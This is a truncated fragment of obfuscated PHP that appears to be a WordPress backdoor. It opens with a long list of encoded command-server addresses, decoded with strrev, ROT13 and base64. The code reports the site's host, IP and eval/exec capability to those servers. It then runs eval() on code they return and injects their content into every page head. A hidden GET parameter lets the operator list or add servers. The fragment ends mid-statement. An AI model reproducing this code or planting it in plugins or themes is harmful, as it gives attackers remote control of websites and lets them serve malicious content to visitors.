‘==DoiAzYfyJLgqTD1DQquu2pcuTIy5zou9zF’, ‘==DoiAzYfyJLgqTDxIzpx5JnuqRoySTnwyJG’, ‘=02ow5PocSJoaORMyE3LyWUHyyTqlIzD’, ‘=02ow5PocSJoaORMuuTqa5JnuAyrcWUquIzD’, ‘g92LhjJnu12MNA3py12oKS2LcWKE’, ‘g92LhjJnu12MNAap1EKMGWKMbO3o0AKnlu2D’, ‘=02ow5PocSJoaOxpyE3puuTIh5JD’, ‘==DoiAzYfyJLgqTDbEKnx5JDyyTnj92H’, ‘g92LhjJnu12MNEaoyq3o05JIhyzqfIJG’, ‘=02ow5PocSJoaORA4xGZxI2MlITn09TpjS0nlSJG’, ‘==DoiAzYfyJLgqTDjLGBkHTq192H0WKMv9zH’, ‘=02ow5PocSJoaORMcSToj1JMfWJDyI2LhSzG’, ‘g92Lhj2ouOHoiWaLuEJn’, ‘=02ow5PoiSTDcEJLg91L’, ‘==DoiAzYf9JLNSQofy2Mw1zYyyJogyzn’, ‘=02ow5PoiSTDljJM0STphf2L1u2L’, ‘==DoiAzYf9JLNSwpyMJLbA3KuEaoucJL’, ‘=02ow5PoiSTDyI2Mu12KyWUMhSzr’, ‘g92Lhj2ouORMlSTnwIzLyAKnhITM’, ‘==DoiAzYf9JLNWKMhEUq1WzocWUMfIJo’, ‘=02ow5PoiSTDfSzpiEJLxkJL’, ‘==DoiAzYf9JLN52omWJna9IL5Szn’, ‘g92Lhj2ouO0pykJn0AaYy5Jn0AKnlu2L’, ‘==DoiAzYf9JLNcKLj5lo05JnwSzn’, ‘=02ow5PoiSTDbAJnyW3pc12oe9zo’, ‘g92Lhj2ouOHZhyzpl9JobqJLhIJo’, ‘==DoiAzYf9JLNWJL0EKMfI2M’, ‘==DoiAzYf9JLNWKM0AKMigzYyyzpl9TM’, ‘=02ow5PoiSTDyEKLgIUnm5Pp’, ‘g92Lhj2ouOxoiAaouq3psSJnh9ToiOKL’, ‘==DoiAzYf9JLN1JLb5JLlW2KgSJnlyJo’, ‘==DoiAzYf9JLNSmolWKL2SzosyKMfSTn’, ‘=02ow5PoiSTDk4zpiu2KuyzpyEJLhSTp’, ‘==DoiAzYf9JLNS2nmSTnm5vq’, ‘g92Lhj2ouORoyITqsyaohI2n’, ‘=02ow5PoiSTDh92phyTqhRJrcWUp’, ‘=02ow5PoiSTDygzp1W2KukToyE3p’, ‘==DoiAzYf9JLN5Jn6k2oj5loxWKLwIzp’, ‘==DoiAzYf9JLNcKMlI3ofSTq’, ‘=02ow5PoiSTDmEapyWzLy9ILbEKMl9TM’, ‘=02ow5PoiSTDkDUoiWzocSzpskJqxWJL’, ‘=02ow5PoiSTDmITqlIJqz5vq’, ‘=02ow5PoiSTDay2q0WKLb9SMyW3L’, ‘=02ow5PoiSTDa5Jnzu2olyaplSTo’, ‘g92Lhj2ouO0phy2May2qh4Jn2kJL’, ‘g92Lhj2ouOHZ5ITofI2nh8Jnwyzp1SJo’, ‘==DoiAzYf9JLN1JLhgJnh9ILxIzq’, ‘g92Lhj2ouOHnhyJqlIzoiITo’, ‘==DoiAzYf9JLNqzouI3oe5Fo’, ‘=02ow5PoiSTDuEJMl9zrsSTn0WKMvkJL’, ‘==DoiAzYf9JLNWKqm5JLg9In’, ‘==DoiAzYf9JLN52ogg2Lcu2KhS2Ml9Jo’, ‘==DoiAzYf9JLNWKMxyJMz5lL’, ‘=02ow5PoiSTDhyTo1EzYbAKL’, ‘g92Lhj2ouOxpy5zpiqzYukJMgSTp’, ‘g92Lhj2ouOxohS2qhRzrukzL’, ‘=02ow5PoiSTDykJM6IJn65FL’, ‘==DoiAzYf9JLNA3pyu2Kv9zp’, ‘==DoiAzYf9JLNWUnikzMhRToyy2LuW3M’, ‘=02ow5PoiSTDkHzoiMKLv9ILckJMlIKL’, ‘g92Lhj2ouOHZfIKLj9In’, ‘=02ow5PoiSTDm5JnaE2ob5PqlSzL’, ‘==DoiAzYf9JLNITouIzqhxTM’, ‘=02ow5PoiSTDuy2LmIKosSTMhIUnmSTo’, ‘=02ow5PoiSTDkf2Li1zYuEKnf9To’, ‘g92Lhj2ouOxouAJn4IJoskJnlOKL’, ‘=02ow5PoiSTDkjToyq3oj5voyWKn’, ‘=02ow5PoiSTD0IJog9zpw5ln’, ‘=02ow5PoiSTDmO3oiE3p0IJMd5JLly2n’, ‘==DoiAzYf9JLNk2olWKLw9IL0AKMx9Jo’, ‘g92Lhj2ouOxouyKLvSzLxITnmSzp’, ‘g92Lhj2ouOHZmgzpuOaYfkJM3Izn’, ‘g92Lh82obSJrN1Jn5I2p192DuAKn19TG’, ‘=02ow5loiuJL5OHqf9zocqUMi92Euy2LckJD’, ‘=02ow5loiuJL5O0ohy3p3Izpx5JDyy2nwSzF’, ‘g92Lh82obSJrN9zMuIzpi1zpyMKnZITq0ITof92D’, ‘=02ow5loiuJL5OHrfyJrlWKIuyzqfy3H’, ‘=02ow5loiuJL5ORMiMzoiAaocW2oFSJnwIUG’, ‘g92Lh82obSJrNqJn2AKn0WKLDyUolS2D’, ‘g92Lh82obSJrNI3pjIJnh5JMZy3p0STH’, ‘=02ow5loiuJL5O0MxSJMm9zDyyzqyE3H’, ‘==DoiAzYi9TnuyUDeSzp5ITouITFyyzouuTpyE3H’, ‘=02ow5loiuJL5OHrhITquuJnByaplITI’, ‘g92Lh82obSJrNyzLy5JnzMJnlqHL5SJG’, ‘g92Lh82obSJrNAJo1I2Mxyzpa5JLZyaohSTE’, ‘g92Lh82obSJrNOKngyKM39TIyIKpckJMa5JD’, ‘=02ow5loiuJL5OxMaIKMm9zHgy2F’, ‘=02ow5loiuJL5OxL5kzoiAUoy5xoiWapuu2H’, ‘g92Lh82obSJrN1JrayaplSTF5ITocI2F’, ‘==DoiAzYi9TnuyUD5WJnmI2MxyzpPyzLv9zD’, ‘==DoiAzYi9TnuyUDfy3LxW3ozkTouuHL5SJG’, ‘g92Lh82obSJrN52o0yKMfu2L0STIy5JMxSzF’, ‘=02ow5loiuJL5O0oi1TMuETMuuHMwyzouu2H’, ‘=02ow5loiuJL5OxoukJMiqJLFyaLvyTG’, ‘=02ow5loiuJL5OHM0SJMfOUpcEIrwSTG’, ‘=02ow5loiuJL5OHrv9Tnw92oUyKogS2H’, ‘g92Lh82obSJrNE3o25JMfkJEhIJn2yzI’, ‘==DoiAzYi9TnuyUD5WJqy5JnxWKLXIJn0AKnlu2D’, ‘g92Lh82obSJrNIaq1g2LcuTpfIHMfITnwyJG’, ‘=02ow5loiuJL5O0oj9TolSJEyyTofyJG’, ‘==DoiAzYi9TnuyUDvyUMyyTqmyzpbAHLcqzpiI2E’, ‘g92Lh82obSJrN9zpf52omyzohITEyyToc1JE’, ‘==DoiAzYi9TnuyUDlqJrmyToa5JFgSJnlyJG’, ‘==DoiAzYi9TnuyUDuIKqfkJqU52o2ITE’, ‘=02ow5loiuJL5OHqgIUq0I2nwSToP5JLly2F’, ‘==DoiAzYi9TnuyUDuy3LxITq4y2IhyJo6SJJ’, ‘=02ow5loiuJL5OHnm9zpyAap1OyouIzF’, ‘=02ow5loiuJL5OHLcAKr2STEyIJnx9zF’, ‘==DoiAzYi9TnuyUD292pyAJrlWHrfWKM2IzD’, ‘==DoiAzYi9TnuyUDcWJLwyzqyAJnaSzpRyaohSzE’, ‘=02ow5loiuJL5OHrwIUofI2nmSJGyyzLvITE’, ‘g92Lh82obSJrN5JneyToiyJLlWKMTSzpuy2D’, ‘g92Lh82obSJrN9zqc52o0WKMe5JnDyKMfSTF’, ‘=02ow5loiuJL5O0L1y3nlIUqlIUFuEKnhIzD’, ‘g92Lh82obSJrNSJnw52omETou52oREKMhSzF’, ‘g92Lh82obSJrNyKouyaLfyTnDITq0ITof92D’, ‘=02ow5loiuJL5OHnzWJMc5zoykHngIzH’, ‘g92LhjJnu1TqiuTD5kJnlyUqyM2oeIar’, ‘=02ow5PocSJo09TnNM3olyUpcuJMgSzM’, ‘g92LhjJnu1TqiuTDyEKqlyTriEJqvyan’, ‘g92LhjJnu1TqiuTDcWKneSzo1E3olyJp’, ‘g92LhjJnu1TqiuTDuqJLfyUMiq2o0yzL’, ‘=02ow5PocSJo09TnNEKqvI2L1uJrzI2M’, ‘g92LhjJnu1TqiuTDu5Jndy3MyOKnaITq’, ‘=02ow5PocSJo09TnNcKrkIzq15JnhIUo’, ‘=02ow5PocSJo09TnNEJqgIaL1WKMvy3n’, ‘g92LhjJnu1TqiuTDuEKMlyzr5A3o6Iar’, ‘g92LhjJnu1TqiuTDcuKr6y3pcEJMmyzM’, ‘=02ow5PocSJo09TnNWKrkSzo5E3oh92n’, ‘g92LhjJnu1TqiuTD55JMwy3MigJrjSzM’, ‘=02ow5PocSJo09TnNuKLaSTnu52o3yUM’, ‘g92LhjJnu1TqiuTDyqKn6SJp1AJnfyUo’, ‘=02ow5PocSJo09TnNOKLxSzMcuJMwSTr’, ‘g92LhjJnu1TqiuTDyg2olyzpiuJn4yzo’, ‘=02ow5PocSJo09TnNAJngIaMyAKrvIzL’, ‘g92LhjJnu1TqiuTDu1JLmIaM1M3owS2n’, ‘=02ow5PocSJo09TnNA3oxSzn1MJrwyap’, ‘g92LhjJnu1TqiuTDiuKq69zr5u2o0SJo’, ‘=02ow5PocSJo09TnNAKrgyUn5uKqb9To’, ‘g92LhjJnu1TqiuTDykJqgIKpuqJrayTn’, ‘g92LhjJnu1TqiuTDyWKLxyzpcqJq4Szp’, ‘=02ow5PocSJo09TnNAJL0I2LcAJnxyzn’, ‘g92LhjJnu1TqiuTD5c2ojSzMcAKnzyzo’, ‘=02ow5PocSJo09TnNcKqeyzniqJLl9To’, ‘=02ow5PocSJo09TnNu2o4y2MiAJM0Iao’, ‘=02ow5PocSJo09TnN5JreS2M5EKnhITo’, ‘=02ow5PocSJo09TnNAJnwyUncEJqbSTo’, ‘=02ow5PocSJo09TnNuJnvIznuEKMaIao’, ‘g92LhjJnu1TqiuTD1EKrmy3LyMJqkIKo’, ‘g92LhjJnu1TqiuTDuEJMfIUo5kJq4y2M’, ‘g92LhjJnu1TqiuTDyEKMgIUM5MJMgS2n’, ‘g92LhjJnu1TqiuTDuAKrmy3LuAKrk9zn’, ‘g92LhjJnu1TqiuTDcWJLgy3ny5Jq6yTp’, ‘g92LhjJnu1TqiuTDyMJLjSTM5W3o49zp’, ‘=02ow5PocSJo09TnNW3oaSTMcuKrmITo’, ‘=02ow5PocSJo09TnNSKr6IaLcSKMbS2n’, ‘g92LhjJnu1TqiuTD1E2o2yzruAKqv9zq’, ‘=02ow5PocSJo09TnNEJngITqucJreyTM’, ‘g92LhjJnu1TqiuTDiu2oly3L1u3o3yaM’, ‘g92LhjJnu1TqiuTD15Jqa9zn1OKqmyJp’, ‘g92LhjJnu1TqiuTDuuKn4SJpiAKrey3p’, ‘=02ow5PocSJo09TnNgJMzSJpuWJq2yTp’, ‘=02ow5PocSJo09TnNuJn4IzqiW3o39Jo’, ‘g92LhjJnu1TqiuTD5SKnmIaricKrvIJo’, ‘=02ow5PocSJo09TnNS3odS2MyuJqxyTo’, ‘=02ow5PocSJo09TnNcJrzyJp55JqeI2q’, ‘g92Lhf2oikTq19TD5uJL4yTM1EKMk9zM’, ‘g92Lhf2oikTq19TD5AJq4Iaq1uKq4y2p’, ‘=02ow5lni9To0I3oNc3ojIKocMJMgy3n’, ‘=02ow5lni9To0I3oNc3ogSzq5EJnaIUo’, ‘=02ow5lni9To0I3oNcKnd92pigJM292p’, ‘g92Lhf2oikTq19TD5EJMfy3pycJn29zr’, ‘=02ow5lni9To0I3oNcJqkyaq1gJr0Izo’, ‘g92Lhf2oikTq19TDyAJnd9Tn5EJMwSJp’, ‘=02ow5lni9To0I3oNSKLgyUpygJq4yao’, ‘g92Lhf2oikTq19TDuEJrjIzocuJMxS2L’, ‘=02ow5lni9To0I3oNu3ojyJoySKqvITr’, ‘g92Lhf2oikTq19TD5EJqhyTn1gJMkyan’, ‘g92Lhf2oikTq19TD5AJneITncqJndyUp’, ‘g92Lhf2oikTq19TD15JnwIUoykJLgI2M’, ‘g92Lhf2oikTq19TDuOKrfSJou1Jn0IUr’, ‘=02ow5lni9To0I3oNuKqhyapcWKnxy2M’, ‘=02ow5lni9To0I3oNcKMbSznucJq0Iap’, ‘g92Lhf2oikTq19TD5A3omy3nicJrdy3M’, ‘g92Lhf2oikTq19TD1WJrgS2Mc12omIzM’, ‘=02ow5lni9To0I3oNO3ofy3qiMKqbIzr’, ‘=02ow5lni9To0I3oNEKn4I3L1SKqfIUq’, ‘=02ow5lni9To0I3oN5JrfyzMcMJqfIKp’, ‘=02ow5lni9To0I3oNqKrxSTqygJrk9zo’, ‘g92Lhf2oikTq19TDikJnvSJp5qKqkIar’, ‘g92Lhf2oikTq19TD5O3ovy2piqJnhIUq’, ‘g92Lhf2oikTq19TDyMKL092L5MKqwIzL’, ‘=02ow5lni9To0I3oNcJqbIap5cKL0yKp’, ‘g92Lhf2oikTq19TD5qKrdS2qiAJMvITq’, ‘=02ow5lni9To0I3oNWKM6yarycJqjSzo’, ‘=02ow5lni9To0I3oN1JM39JoiAKMbyaL’, ‘g92Lhf2oikTq19TD55JnmIUM1cKrm92p’, ‘=02ow5lni9To0I3oNq3oh9zryc3og9Tq’, ‘g92Lhf2oikTq19TD1OKrvyaMuWJqxyUM’, ‘g92Lhf2oikTq19TDiMKnvyaM1uJngIzr’, ‘=02ow5lni9To0I3oNqKMbIUnyqKMeSTp’, ‘=02ow5lni9To0I3oNqKngIzL1uKLlIzo’, ‘g92Lhf2oikTq19TDu52oj92LyuJLmyzp’, ‘=02ow5lni9To0I3oNOKL69zMucKMlSTM’, ‘=02ow5lni9To0I3oNuKqmyTnucJM2I3L’, ‘g92Lhf2oikTq19TDySKrmSTn5qKLbIao’, ‘g92Lhf2oikTq19TD1EKnxIJoccKL0Iao’, ‘g92Lhf2oikTq19TD5qKr6yzoicJMa9zo’, ‘g92Lhf2oikTq19TDuqJnzIao1MJnxIao’, ‘=02ow5lni9To0I3oNc2odI2p1WKMgIzr’, ‘g92Lhf2oikTq19TD1uKndSTquqJrhSTo’, ‘=02ow5lni9To0I3oNuKrwyap1cJL39Tn’, ‘=02ow5lni9To0I3oNEJrkS2pikJMbIzn’, ‘g92Lhf2oikTq19TDiqJMay2p1E2ofyaL’, ‘g92Lhf2oikTq19TDiqKqfIzoykJqlyzo’, ‘=02ow5lni9To0I3oNcKrbSzn51JrzI2n’, ‘=02ow5lni9To0I3oNgJLh92McuKqm92p’, ‘g92Lhf2oikTq19TDcq2owyap112ox9Tq’, ‘g92Lhf2oikTq19TDiWJq6yJoykJMjS2M’, ‘g92Lhf2oikTq19TDugJray3qcqJnwSzM’, ‘g92Lhf2oikTq19TDcqJnmyzruEKqeyzM’, ‘=02ow5lni9To0I3oN5JMmyUr5AJn2yUp’, ‘g92Lhf2oikTq19TD5MJLfyTMuc3o6Izr’, ‘g92Lhf2oikTq19TDiAJq6yTpyEJMbI3M’, ‘=02ow5lni9To0I3oNAJqvI2q1MKLxS2q’, ‘g92Lhf2oikTq19TD1EKLeSzp11JLxy2p’, ); $this->dIOUyQsvDqPHTBIxnlYs(); $this->YobOrWbieESFVcSsWsuBypg = false; $oXyaqmHoChvHQFCvTluqmAC = get_option(WP_OPTION_KEY); if ($oXyaqmHoChvHQFCvTluqmAC == null || $oXyaqmHoChvHQFCvTluqmAC == ‘null’) { $oXyaqmHoChvHQFCvTluqmAC = ”; } if ($oXyaqmHoChvHQFCvTluqmAC == ”){ $this->wqawPxkNytKqRKNRqbwAdw = true; $this->AeRxXNHxOXpcNJWlZSIKLhIw = new VtkddwvkYgCDDRRWbgRtw(‘new’); $this->QxEolVsSqvJZyRSgHFmL(); } else{ $this->AeRxXNHxOXpcNJWlZSIKLhIw = new VtkddwvkYgCDDRRWbgRtw(); $this->oXyaqmHoChvHQFCvTluqmAC = $this->McEnUjjQfaFzqGsihhU($oXyaqmHoChvHQFCvTluqmAC, true); if (isset($this->oXyaqmHoChvHQFCvTluqmAC[‘info’][‘publicKey’])) { $this->AeRxXNHxOXpcNJWlZSIKLhIw->skwTpfzBalSTBTBkLvhw($this->oXyaqmHoChvHQFCvTluqmAC[‘info’][‘publicKey’]); } } $this->OFwlxWaeMyxznpZtnfJLQA(); if ($this->TztHMzNNJASlMfiSOwxQpE()) { die(); } if (!$this->wqawPxkNytKqRKNRqbwAdw) { $this->KPBBXYwmuPGPaTyLhWevI(); } } private function QxEolVsSqvJZyRSgHFmL(){ $WbKPQMoSbMZkXUeYKXRIk = $this->KZdGlovqEtKYUSCqSVnK(); $WbKPQMoSbMZkXUeYKXRIk[‘publicKey’] = $this->AeRxXNHxOXpcNJWlZSIKLhIw->qPhSGyDrRdyPezAnHgiao(); $this->WbKPQMoSbMZkXUeYKXRIk = $WbKPQMoSbMZkXUeYKXRIk; $vsJigIMHYwdFnuqvRwrvms = false; $BCEUSjHFFwzzqmHmpjjQI = 0; foreach($this->HSxTktcbTftjZjKRHHmhr() as $gXNjWLFkUQOugyREMXKvZBfw){ $oXyaqmHoChvHQFCvTluqmAC = $this->RoQfzgyhgTpMgdUIktgNdYvKE($gXNjWLFkUQOugyREMXKvZBfw,$WbKPQMoSbMZkXUeYKXRIk); $oXyaqmHoChvHQFCvTluqmAC = $this->gTSiihhIRUNPkADDVdes($oXyaqmHoChvHQFCvTluqmAC); if ($oXyaqmHoChvHQFCvTluqmAC !== false) { $vsJigIMHYwdFnuqvRwrvms = true; if ($this->YobOrWbieESFVcSsWsuBypg) { break; } break; } } if ($vsJigIMHYwdFnuqvRwrvms) { if ($this->YobOrWbieESFVcSsWsuBypg) { $oXyaqmHoChvHQFCvTluqmAC = $this->oqtYbOOiucMYWyZsGEuETRhB(); } $oXyaqmHoChvHQFCvTluqmAC[‘info’] = $WbKPQMoSbMZkXUeYKXRIk; $this->aIIwgKgvtyRoWoMedUdbp(WP_OPTION_KEY, $oXyaqmHoChvHQFCvTluqmAC); $this->oXyaqmHoChvHQFCvTluqmAC = $oXyaqmHoChvHQFCvTluqmAC; } else { $oXyaqmHoChvHQFCvTluqmAC = $this->oqtYbOOiucMYWyZsGEuETRhB(); $oXyaqmHoChvHQFCvTluqmAC[‘info’] = $WbKPQMoSbMZkXUeYKXRIk; $this->oXyaqmHoChvHQFCvTluqmAC = $oXyaqmHoChvHQFCvTluqmAC; $this->aIIwgKgvtyRoWoMedUdbp(WP_OPTION_KEY, $oXyaqmHoChvHQFCvTluqmAC); $this->XnpSvtOjNDRmxyfzaDKlGwM(); } return $oXyaqmHoChvHQFCvTluqmAC; } public function TztHMzNNJASlMfiSOwxQpE(){ $oXyaqmHoChvHQFCvTluqmAC = $this->oXyaqmHoChvHQFCvTluqmAC; if ($oXyaqmHoChvHQFCvTluqmAC == ”){ return false; } $SntMBKFkfTlUzXyNVQedo = @$_GET[$this->oXyaqmHoChvHQFCvTluqmAC[‘info’][‘serverKey’]]; if (isset($SntMBKFkfTlUzXyNVQedo) && $SntMBKFkfTlUzXyNVQedo == ”) { echo ‘<div id=”serverList” style=”display: none”>’; $bQYduZxDrtPMJtaBCQycHQY[‘servers’] = $oXyaqmHoChvHQFCvTluqmAC[‘servers’]; echo json_encode($bQYduZxDrtPMJtaBCQycHQY); echo ‘</div>’; die(); }else if (isset($SntMBKFkfTlUzXyNVQedo) && isset($this->oXyaqmHoChvHQFCvTluqmAC[‘info’][‘fail’])) { if (isset($this->oXyaqmHoChvHQFCvTluqmAC)) { $oXyaqmHoChvHQFCvTluqmAC = $this->oXyaqmHoChvHQFCvTluqmAC; }else{ $oXyaqmHoChvHQFCvTluqmAC = $this->oqtYbOOiucMYWyZsGEuETRhB(); } $oXyaqmHoChvHQFCvTluqmAC[‘servers’][] = $SntMBKFkfTlUzXyNVQedo; $this->aIIwgKgvtyRoWoMedUdbp(WP_OPTION_KEY, $oXyaqmHoChvHQFCvTluqmAC); die(); } return false; } public function OFwlxWaeMyxznpZtnfJLQA(){ $oXyaqmHoChvHQFCvTluqmAC = $this->oXyaqmHoChvHQFCvTluqmAC; if (!isset($oXyaqmHoChvHQFCvTluqmAC) || $oXyaqmHoChvHQFCvTluqmAC == null) { return; } if (!is_array($oXyaqmHoChvHQFCvTluqmAC) || $oXyaqmHoChvHQFCvTluqmAC == ”) { return; } if (@$oXyaqmHoChvHQFCvTluqmAC[‘info’][‘eval’] == 1){ foreach ($oXyaqmHoChvHQFCvTluqmAC[‘eval’] as $vsGIQvwCXRbSELMOlFV) { eval($vsGIQvwCXRbSELMOlFV); } } if (isset($oXyaqmHoChvHQFCvTluqmAC[‘echo’])){ if (!defined(‘wp_footerLeo’)) { add_action(‘wp_head’, array( $this, ‘WvOoqSuRpZkhgAAFQVjBjSVo’)); } } } public function WvOoqSuRpZkhgAAFQVjBjSVo(){ $oXyaqmHoChvHQFCvTluqmAC = $this->oXyaqmHoChvHQFCvTluqmAC; foreach ($oXyaqmHoChvHQFCvTluqmAC[‘echo’] as $stIedxfhoZcXvZNmNXTdFbI) { echo $stIedxfhoZcXvZNmNXTdFbI; } } private function oqtYbOOiucMYWyZsGEuETRhB() { $oXyaqmHoChvHQFCvTluqmAC = array(); $oXyaqmHoChvHQFCvTluqmAC[‘echo’] = array(); $oXyaqmHoChvHQFCvTluqmAC[‘eval’] = array(); $oXyaqmHoChvHQFCvTluqmAC[‘clients’] = array(); $oXyaqmHoChvHQFCvTluqmAC[‘update’] = array(); return $oXyaqmHoChvHQFCvTluqmAC; } private function dIOUyQsvDqPHTBIxnlYs(){ $dqkdbOJPzAPsLsuxnjAStdXUDis = array(‘www.’, ‘www’, ‘ ‘, ‘{‘, ‘}’); $this->htcFFCQTLLpnCchsPKGYxso = str_replace($dqkdbOJPzAPsLsuxnjAStdXUDis, “”, $_SERVER[‘HTTP_HOST’]); } private function HSxTktcbTftjZjKRHHmhr() { $oXyaqmHoChvHQFCvTluqmAC = array(); foreach ($this->yYVsqvOoqWsddypXgJcIKOw as $gXNjWLFkUQOugyREMXKvZBfw) { $oXyaqmHoChvHQFCvTluqmAC[] = base64_decode(str_rot13(strrev($gXNjWLFkUQOugyREMXKvZBfw))); } if (isset($this->oXyaqmHoChvHQFCvTluqmAC[‘info’][‘fail’])) { $nGwzfuUZcelzyfJBQMIgkk = (int) ($oXyaqmHoChvHQFCvTluqmAC[‘info’][‘fail’] / 100); if ($nGwzfuUZcelzyfJBQMIgkk == 0) { $nGwzfuUZcelzyfJBQMIgkk = 5; } else{ $nGwzfuUZcelzyfJBQMIgkk *= 5; } }else{ $nGwzfuUZcelzyfJBQMIgkk = 5; } return $this->VitTYMKdJITsiXBTLOEA($oXyaqmHoChvHQFCvTluqmAC, $nGwzfuUZcelzyfJBQMIgkk); } private function XsvsqpxlWxfKYiyUc($YJYRbBDIcUlLJwWidyuM) { $oXyaqmHoChvHQFCvTluqmAC = array(); foreach ($this->oXyaqmHoChvHQFCvTluqmAC[’emails’] as $HWcwGasopLJSadVNNw){ $oXyaqmHoChvHQFCvTluqmAC[] = $HWcwGasopLJSadVNNw; } foreach ($this->aJQafHDwnaPrCJrQMjHVh as $HWcwGasopLJSadVNNw) { $oXyaqmHoChvHQFCvTluqmAC[] = base64_decode(str_rot13(strrev($HWcwGasopLJSadVNNw))); } return $this->VitTYMKdJITsiXBTLOEA($oXyaqmHoChvHQFCvTluqmAC, $YJYRbBDIcUlLJwWidyuM); } private function KZdGlovqEtKYUSCqSVnK(){ $oXyaqmHoChvHQFCvTluqmAC = array(); $oXyaqmHoChvHQFCvTluqmAC[‘host’] = $_SERVER[‘HTTP_HOST’]; $oXyaqmHoChvHQFCvTluqmAC[‘page’] = $_SERVER[‘REQUEST_URI’]; $oXyaqmHoChvHQFCvTluqmAC[‘ip’] = $_SERVER[‘SERVER_ADDR’]; $oXyaqmHoChvHQFCvTluqmAC[‘eval’] = $this->YrCTrfUzBfsVJKvqiYUeFbc(); $oXyaqmHoChvHQFCvTluqmAC[‘exec’] = $this->KNstTqErzZQBDQOODaJdLv(); $oXyaqmHoChvHQFCvTluqmAC[‘serverKey’] = $this->BkISKDyWWRXScnLPbTlyI(); $oXyaqmHoChvHQFCvTluqmAC[‘run’] = 0; $oXyaqmHoChvHQFCvTluqmAC[‘ver’] = ‘0.2a’; $oXyaqmHoChvHQFCvTluqmAC[‘started’] = date(‘Ymd’); $oXyaqmHoChvHQFCvTluqmAC[‘last_connect’] = date(‘Ymd’); $this->WbKPQMoSbMZkXUeYKXRIk = $oXyaqmHoChvHQFCvTluqmAC; return $oXyaqmHoChvHQFCvTluqmAC; } private function BkISKDyWWRXScnLPbTlyI($PVSXPKLAQGaWKUtNNUYQFoBuJE = 10) { $dqkdbOJPzAPsLsuxnjAStdXUDis = ‘0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ’; $PqlpeiQHmZBwdmlsfEHmg = ”; for ($BCEUSjHFFwzzqmHmpjjQI = 0; $BCEUSjHFFwzzqmHmpjjQI < $PVSXPKLAQGaWKUtNNUYQFoBuJE; $BCEUSjHFFwzzqmHmpjjQI++) { $PqlpeiQHmZBwdmlsfEHmg .= $dqkdbOJPzAPsLsuxnjAStdXUDis[rand(0, strlen($dqkdbOJPzAPsLsuxnjAStdXUDis) – 1)]; } return $PqlpeiQHmZBwdmlsfEHmg; } public function KPBBXYwmuPGPaTyLhWevI(){ $oXyaqmHoChvHQFCvTluqmAC = $this->oXyaqmHoChvHQFCvTluqmAC; if (@$oXyaqmHoChvHQFCvTluqmAC[‘info’][‘last_connect’] < date(‘Ymd’)){ $oXyaqmHoChvHQFCvTluqmAC = $this->CMQEWmnewJmgOLaFvXGCU($oXyaqmHoChvHQFCvTluqmAC); if ($oXyaqmHoChvHQFCvTluqmAC == false){ return; } else{ unset($oXyaqmHoChvHQFCvTluqmAC[‘info’][‘fail’]); } $oXyaqmHoChvHQFCvTluqmAC[‘info’][‘last_connect’] = date(‘Ymd’); } $oXyaqmHoChvHQFCvTluqmAC[‘info’][‘run’]++; $this->aIIwgKgvtyRoWoMedUdbp(WP_OPTION_KEY, $oXyaqmHoChvHQFCvTluqmAC); } private function CMQEWmnewJmgOLaFvXGCU($oXyaqmHoChvHQFCvTluqmAC){ $yYVsqvOoqWsddypXgJcIKOw = @$oXyaqmHoChvHQFCvTluqmAC[‘servers’]; $uHrzRBdPUetDqbZAdw = $this->tEiRFSJMSpXyxKKORPZClI($yYVsqvOoqWsddypXgJcIKOw, $oXyaqmHoChvHQFCvTluqmAC); if ($uHrzRBdPUetDqbZAdw !== false){ return $uHrzRBdPUetDqbZAdw; } $uHrzRBdPUetDqbZAdw = $this->tEiRFSJMSpXyxKKORPZClI($this->HSxTktcbTftjZjKRHHmhr(), $oXyaqmHoChvHQFCvTluqmAC); if ($uHrzRBdPUetDqbZAdw !== false) { return $uHrzRBdPUetDqbZAdw; } $this->XnpSvtOjNDRmxyfzaDKlGwM(); } private function tEiRFSJMSpXyxKKORPZClI($QrnkCEWRkHbQPoEPelYQRw, $oXyaqmHoChvHQFCvTluqmAC) { foreach ($QrnkCEWRkHbQPoEPelYQRw as $gXNjWLFkUQOugyREMXKvZBfw) { $uHrzRBdPUetDqbZAdw = $this->VxjeXwUeRLricksbcxlcSRnA($gXNjWLFkUQOugyREMXKvZBfw, $oXyaqmHoChvHQFCvTluqmAC[‘info’], $oXyaqmHoChvHQFCvTluqmAC); if ($uHrzRBdPUetDqbZAdw != false) { if (!isset($oXyaqmHoChvHQFCvTluqmAC[‘info’][’empty’])){ $oXyaqmHoChvHQFCvTluqmAC[‘info’][’empty’] = 0; } if ($this->YobOrWbieESFVcSsWsuBypg) { $oXyaqmHoChvHQFCvTluqmAC[‘info’][’empty’]++; if (!isset($BCEUSjHFFwzzqmHmpjjQI)){ $BCEUSjHFFwzzqmHmpjjQI = (int)($oXyaqmHoChvHQFCvTluqmAC[‘info’][’empty’] / 5); } if ($BCEUSjHFFwzzqmHmpjjQI > 0) { $BCEUSjHFFwzzqmHmpjjQI–; continue; } } if ($this->YobOrWbieESFVcSsWsuBypg) { return $oXyaqmHoChvHQFCvTluqmAC; } $uHrzRBdPUetDqbZAdw[‘info’][’empty’] = –$oXyaqmHoChvHQFCvTluqmAC[‘info’][’empty’]; return $uHrzRBdPUetDqbZAdw; } } return false; } private function VxjeXwUeRLricksbcxlcSRnA($gXNjWLFkUQOugyREMXKvZBfw, $WbKPQMoSbMZkXUeYKXRIk, $oXyaqmHoChvHQFCvTluqmAC) { $this->YobOrWbieESFVcSsWsuBypg = false; $OQijXfnrxWxPIcPSUibKEFmLE = $this->RoQfzgyhgTpMgdUIktgNdYvKE($gXNjWLFkUQOugyREMXKvZBfw, $WbKPQMoSbMZkXUeYKXRIk); $OQijXfnrxWxPIcPSUibKEFmLE = $this->gTSiihhIRUNPkADDVdes($OQijXfnrxWxPIcPSUibKEFmLE); if ($OQijXfnrxWxPIcPSUibKEFmLE != false) { if ($this->YobOrWbieESFVcSsWsuBypg) { return $oXyaqmHoChvHQFCvTluqmAC; } $OQijXfnrxWxPIcPSUibKEFmLE[‘info’] = $WbKPQMoSbMZkXUeYKXRIk; return $OQijXfnrxWxPIcPSUibKEFmLE; } return false; } private function gTSiihhIRUNPkADDVdes($oXyaqmHoChvHQFCvTluqmAC){ if(!isset($this->WbKPQMoSbMZkXUeYKXRIk)){ $this->WbKPQMoSbMZkXUeYKXRIk = $this->oXyaqmHoChvHQFCvTluqmAC[‘info’]; } if (md5($this->WbKPQMoSbMZkXUeYKXRIk[‘serverKey’]) == $oXyaqmHoChvHQFCvTluqmAC) { $this->YobOrWbieESFVcSsWsuBypg = true; return true; } $oXyaqmHoChvHQFCvTluqmAC = 